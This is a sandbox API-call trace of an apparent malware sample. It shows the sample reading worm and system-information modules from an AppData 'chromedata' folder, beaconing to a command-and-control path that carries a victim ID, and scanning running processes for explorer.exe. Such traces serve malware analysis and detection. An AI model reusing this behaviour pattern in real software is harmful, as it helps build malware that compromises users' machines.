	[0256.048] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.048] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.048] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.048] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0256.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.048] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0256.048] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.049] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.049] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0256.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.049] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0256.049] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.049] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.049] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0256.049] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0256.049] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/yEXtDXtAXq9VsCUoBVr8Qk5Pm5/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0256.049] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0256.049] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0256.407] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0256.407] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0256.407] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0256.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa20
	[0256.408] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x22ffa20, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ffa20*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0256.408] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0256.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffa20, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0256.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0256.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffa20, cbMultiByte=3, lpWideCharStr=0x22ff930, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0256.408] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0256.408] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0256.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa50
	[0256.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0256.409] lstrcpynW (in: lpString1=0x22fff90, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0256.409] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fffa8) returned 1
	[0256.409] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff930) returned 1
	[0256.409] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa50) returned 1
	[0256.409] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0256.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x700
	[0256.413] Process32FirstW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0256.415] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0256.415] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0256.417] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0256.417] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0256.418] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0256.418] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.419] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0256.419] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0256.420] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0256.420] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.421] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0256.421] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0256.421] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0256.421] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0256.422] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0256.422] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0256.423] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0256.423] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0256.424] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0256.424] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.425] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.425] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.426] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.426] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.427] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.427] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.428] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.428] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.429] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.429] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.430] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.430] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.431] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.431] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0256.431] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0256.431] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.432] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.432] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0256.433] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0256.433] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.434] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0256.434] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.435] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.435] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.436] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0256.436] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0256.437] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0256.437] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0256.437] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0256.437] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0256.438] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0256.438] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0256.439] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0256.439] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0256.440] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0256.440] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0256.441] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0256.441] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0256.442] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0256.442] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0256.442] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0256.442] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0256.443] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0256.443] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0256.444] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0256.444] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0256.445] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0256.445] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0256.446] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0256.446] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0256.447] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0256.447] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0256.447] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0256.447] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0256.448] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0256.448] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0256.481] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0256.481] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0256.481] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0256.482] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0256.482] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0256.482] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0256.483] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0256.483] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.484] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0256.484] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.485] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0256.485] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.486] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0256.486] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0256.487] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0256.487] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.488] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.488] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.488] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.488] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.489] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
